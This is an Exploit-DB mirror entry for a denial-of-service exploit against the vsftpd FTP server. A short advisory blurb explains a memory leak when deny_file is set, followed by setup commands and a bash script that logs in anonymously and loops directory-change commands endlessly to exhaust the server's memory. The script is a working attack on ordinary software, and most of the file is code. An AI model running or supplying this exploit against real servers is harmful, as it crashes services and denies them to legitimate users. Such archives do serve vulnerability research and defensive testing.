exploit-db-mirror/exploits/windows/dos/31818.sh
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

21 lines
No EOL
532 B
Bash
Executable file

source: https://www.securityfocus.com/bid/29322/info
The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.
Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.
# echo deny_file=foo >> /etc/vsftpd/vsftpd.conf
# service vsftpd restart
$ cat > memtest.sh <<EOF
EOF
#!/bin/bash
echo USER anonymous
echo PASS foo@bar.com
while [ 1 ]; do
echo CWD pub
echo CWD ..
done
EOF